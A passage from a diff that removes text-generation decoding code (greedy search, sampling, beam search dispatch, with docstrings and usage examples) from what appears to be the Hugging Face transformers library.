diversity_penalty=diversity_penalty, - remove_invalid_values=remove_invalid_values, - exponential_decay_length_penalty=exponential_decay_length_penalty, - logits_processor=logits_processor, - renormalize_logits=renormalize_logits, - ) - - # 8. prepare stopping criteria - stopping_criteria = self._get_stopping_criteria( - max_length=max_length, max_time=max_time, stopping_criteria=stopping_criteria - ) - - # 9. go into different generation modes - if is_greedy_gen_mode: - if num_return_sequences > 1: - raise ValueError( - f"num_return_sequences has to be 1, but is {num_return_sequences} when doing greedy search." - ) - - # 10. run greedy search - return self.greedy_search( - input_ids, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_sample_gen_mode: - # 10. prepare logits warper - logits_warper = self._get_logits_warper( - top_k=top_k, - top_p=top_p, - typical_p=typical_p, - temperature=temperature, - num_beams=num_beams, - renormalize_logits=renormalize_logits, - ) - - # 11. expand input_ids with `num_return_sequences` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, - expand_size=num_return_sequences, - is_encoder_decoder=self.config.is_encoder_decoder, - **model_kwargs, - ) - - # 12. run sample - return self.sample( - input_ids, - logits_processor=logits_processor, - logits_warper=logits_warper, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_beam_gen_mode: - if num_return_sequences > num_beams: - raise ValueError("`num_return_sequences` has to be smaller or equal to `num_beams`.") - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - - # 10. prepare beam search scorer - beam_scorer = BeamSearchScorer( - batch_size=batch_size, - num_beams=num_beams, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - num_beam_hyps_to_keep=num_return_sequences, - ) - # 11. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, expand_size=num_beams, is_encoder_decoder=self.config.is_encoder_decoder, **model_kwargs - ) - # 12. run beam search - return self.beam_search( - input_ids, - beam_scorer, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_beam_sample_gen_mode: - # 10. prepare logits warper - logits_warper = self._get_logits_warper( - top_k=top_k, - top_p=top_p, - typical_p=typical_p, - temperature=temperature, - num_beams=num_beams, - renormalize_logits=renormalize_logits, - ) - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - # 11. prepare beam search scorer - beam_scorer = BeamSearchScorer( - batch_size=batch_size * num_return_sequences, - num_beams=num_beams, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - ) - - # 12. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, - expand_size=num_beams * num_return_sequences, - is_encoder_decoder=self.config.is_encoder_decoder, - **model_kwargs, - ) - - # 13. run beam sample - return self.beam_sample( - input_ids, - beam_scorer, - logits_processor=logits_processor, - logits_warper=logits_warper, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_group_beam_gen_mode: - if num_return_sequences > num_beams: - raise ValueError("`num_return_sequences` has to be smaller or equal to `num_beams`.") - - if num_beams % num_beam_groups != 0: - raise ValueError("`num_beams` should be divisible by `num_beam_groups` for group beam search.") - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - - # 10. prepare beam search scorer - beam_scorer = BeamSearchScorer( - batch_size=batch_size, - num_beams=num_beams, - max_length=stopping_criteria.max_length, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - num_beam_hyps_to_keep=num_return_sequences, - num_beam_groups=num_beam_groups, - ) - # 11. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, expand_size=num_beams, is_encoder_decoder=self.config.is_encoder_decoder, **model_kwargs - ) - # 12. run beam search - return self.group_beam_search( - input_ids, - beam_scorer, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_constraint_gen_mode: - if num_return_sequences > num_beams: - raise ValueError("`num_return_sequences` has to be smaller or equal to `num_beams`.") - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - - if num_beams <= 1: - raise ValueError("`num_beams` needs to be greater than 1 for constrained genertation.") - - if do_sample: - raise ValueError("`do_sample` needs to be false for constrained generation.") - - if num_beam_groups is not None and num_beam_groups > 1: - raise ValueError("`num_beam_groups` not supported yet for constrained generation.") - - final_constraints = [] - if constraints is not None: - final_constraints = constraints - - if force_words_ids is not None: - - def typeerror(): - raise ValueError( - "`force_words_ids` has to either be a `List[List[List[int]]]` or `List[List[int]]`" - f"of positive integers, but is {force_words_ids}." - ) - - if not isinstance(force_words_ids, list) or len(force_words_ids) == 0: - typeerror() - - for word_ids in force_words_ids: - if isinstance(word_ids[0], list): - if not isinstance(word_ids, list) or len(word_ids) == 0: - typeerror() - if any(not isinstance(token_ids, list) for token_ids in word_ids): - typeerror() - if any( - any((not isinstance(token_id, int) or token_id < 0) for token_id in token_ids) - for token_ids in word_ids - ): - typeerror() - - constraint = DisjunctiveConstraint(word_ids) - else: - if not isinstance(word_ids, list) or len(word_ids) == 0: - typeerror() - if any((not isinstance(token_id, int) or token_id < 0) for token_id in word_ids): - typeerror() - - constraint = PhrasalConstraint(word_ids) - final_constraints.append(constraint) - - # 10. prepare beam search scorer - constrained_beam_scorer = ConstrainedBeamSearchScorer( - constraints=final_constraints, - batch_size=batch_size, - num_beams=num_beams, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - num_beam_hyps_to_keep=num_return_sequences, - ) - # 11. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, expand_size=num_beams, is_encoder_decoder=self.config.is_encoder_decoder, **model_kwargs - ) - # 12. run beam search - return self.constrained_beam_search( - input_ids, - constrained_beam_scorer=constrained_beam_scorer, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - def greedy_search( - self, - input_ids: torch.LongTensor, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[GreedySearchOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **greedy decoding** and can be - used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific keyword arguments will be forwarded to the `forward` function of the model. - If model is an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.GreedySearchDecoderOnlyOutput`], [`~generation_utils.GreedySearchEncoderDecoderOutput`] - or `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.GreedySearchDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.GreedySearchEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForCausalLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... StoppingCriteriaList, - ... MaxLengthCriteria, - ... ) - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> # set pad_token_id to eos_token_id because GPT2 does not have a EOS token - >>> model.config.pad_token_id = model.config.eos_token_id - - >>> input_prompt = "It might be possible to" - >>> input_ids = tokenizer(input_prompt, return_tensors="pt").input_ids - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(10, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - >>> stopping_criteria = StoppingCriteriaList([MaxLengthCriteria(max_length=20)]) - - >>> outputs = model.greedy_search( - ... input_ids, logits_processor=logits_processor, stopping_criteria=stopping_criteria - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ["It might be possible to get a better understanding of the nature of the problem, but it's not"] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList([MaxLengthCriteria(max_length=max_length)])` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - # keep track of which sequences are already finished - unfinished_sequences = input_ids.new(input_ids.shape[0]).fill_(1) - cur_len = input_ids.shape[-1] - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - # prepare model inputs - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - # forward pass to get next token - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_logits,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # pre-process distribution - next_tokens_scores = logits_processor(input_ids, next_token_logits) - - # argmax - next_tokens = torch.argmax(next_tokens_scores, dim=-1) - - # finished sentences should have their next token be a padding token - if eos_token_id is not None: - if pad_token_id is None: - raise ValueError("If `eos_token_id` is defined, make sure that `pad_token_id` is defined.") - next_tokens = next_tokens * unfinished_sequences + pad_token_id * (1 - unfinished_sequences) - - # update generated ids, model inputs, and length for next step - input_ids = torch.cat([input_ids, next_tokens[:, None]], dim=-1) - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - cur_len = cur_len + 1 - - # if eos_token was found in one sentence, set sentence to finished - if eos_token_id is not None: - unfinished_sequences = unfinished_sequences.mul((next_tokens != eos_token_id).long()) - - # stop when each sentence is finished, or if we exceed the maximum length - if unfinished_sequences.max() == 0 or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - if return_dict_in_generate: - if self.config.is_encoder_decoder: - return GreedySearchEncoderDecoderOutput( - sequences=input_ids, - scores=scores, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return GreedySearchDecoderOnlyOutput( - sequences=input_ids, - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return input_ids - - def sample( - self, - input_ids: torch.LongTensor, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - logits_warper: Optional[LogitsProcessorList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[SampleOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **multinomial sampling** and - can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - logits_warper (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsWarper`] used - to warp the prediction score distribution of the language modeling head applied before multinomial - sampling at each generation step. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.SampleDecoderOnlyOutput`], [`~generation_utils.SampleEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.SampleDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.SampleEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForCausalLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... TopKLogitsWarper, - ... TemperatureLogitsWarper, - ... StoppingCriteriaList, - ... MaxLengthCriteria, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> # set pad_token_id to eos_token_id because GPT2 does not have a EOS token - >>> model.config.pad_token_id = model.config.eos_token_id - - >>> input_prompt = "Today is a beautiful day, and" - >>> input_ids = tokenizer(input_prompt, return_tensors="pt").input_ids - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(15, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - >>> # instantiate logits processors - >>> logits_warper = LogitsProcessorList( - ... [ - ... TopKLogitsWarper(50), - ... TemperatureLogitsWarper(0.7), - ... ] - ... ) - - >>> stopping_criteria = StoppingCriteriaList([MaxLengthCriteria(max_length=20)]) - - >>> torch.manual_seed(0) # doctest: +IGNORE_RESULT - >>> outputs = model.sample( - ... input_ids, - ... logits_processor=logits_processor, - ... logits_warper=logits_warper, - ... stopping_criteria=stopping_criteria, - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Today is a beautiful day, and a wonderful day.\n\nI was lucky enough to meet the'] - ```""" - - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - logits_warper = logits_warper if logits_warper is not None else LogitsProcessorList() - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - # keep track of which sequences are already finished - unfinished_sequences = input_ids.new(input_ids.shape[0]).fill_(1) - cur_len = input_ids.shape[-1] - - this_peer_finished = False # used by synced_gpus only - # auto-regressive generation - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - # prepare model inputs - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - # forward pass to get next token - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - - # pre-process distribution - next_token_scores = logits_processor(input_ids, next_token_logits) - next_token_scores = logits_warper(input_ids, next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_scores,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # sample - probs = nn.functional.softmax(next_token_scores, dim=-1) - next_tokens = torch.multinomial(probs, num_samples=1).squeeze(1) - - # finished sentences should have their next token be a padding token - if eos_token_id is not None: - if pad_token_id is None: - raise ValueError("If `eos_token_id` is defined, make sure that `pad_token_id` is defined.") - next_tokens = next_tokens * unfinished_sequences + pad_token_id * (1 - unfinished_sequences) - - # update generated ids, model inputs, and length for next step - input_ids = torch.cat([input_ids, next_tokens[:, None]], dim=-1) - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - cur_len = cur_len + 1 - - # if eos_token was found in one sentence, set sentence to finished - if eos_token_id is not None: - unfinished_sequences = unfinished_sequences.mul((next_tokens != eos_token_id).long()) - - # stop when each sentence is finished, or if we exceed the maximum length - if unfinished_sequences.max() == 0 or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - if return_dict_in_generate: - if self.config.is_encoder_decoder: - return SampleEncoderDecoderOutput( - sequences=input_ids, - scores=scores, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return SampleDecoderOnlyOutput( - sequences=input_ids, - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return input_ids - - def beam_search( - self, - input_ids: torch.LongTensor, - beam_scorer: BeamScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[BeamSearchOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **beam search decoding** and - can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - beam_scorer (`BeamScorer`): - An derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation. For more information, the documentation of [`BeamScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`generation_utilsBeamSearchDecoderOnlyOutput`], [`~generation_utils.BeamSearchEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSearchDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.BeamSearchEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... BeamSearchScorer, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - - >>> # lets run beam search using 3 beams - >>> num_beams = 3 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> # instantiate beam scorer - >>> beam_scorer = BeamSearchScorer( - ... batch_size=1, - ... num_beams=num_beams, - ... device=model.device, - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - - >>> outputs = model.beam_search(input_ids, beam_scorer, logits_processor=logits_processor, **model_kwargs) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt bist du?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - if len(stopping_criteria) == 0: - warnings.warn("You don't have defined any stopping_criteria, this will likely loop forever", UserWarning) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - batch_size = len(beam_scorer._beam_hyps) - num_beams = beam_scorer.num_beams - - batch_beam_size, cur_len = input_ids.shape - - if num_beams * batch_size != batch_beam_size: - raise ValueError( - f"Batch dimension of `input_ids` should be {num_beams * batch_size}, but is {batch_beam_size}." - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - beam_indices = ( - tuple(() for _ in range(batch_beam_size)) if (return_dict_in_generate and output_scores) else None - ) - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - beam_scores = torch.zeros((batch_size, num_beams), dtype=torch.float, device=input_ids.device) - beam_scores[:, 1:] = -1e9 - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - 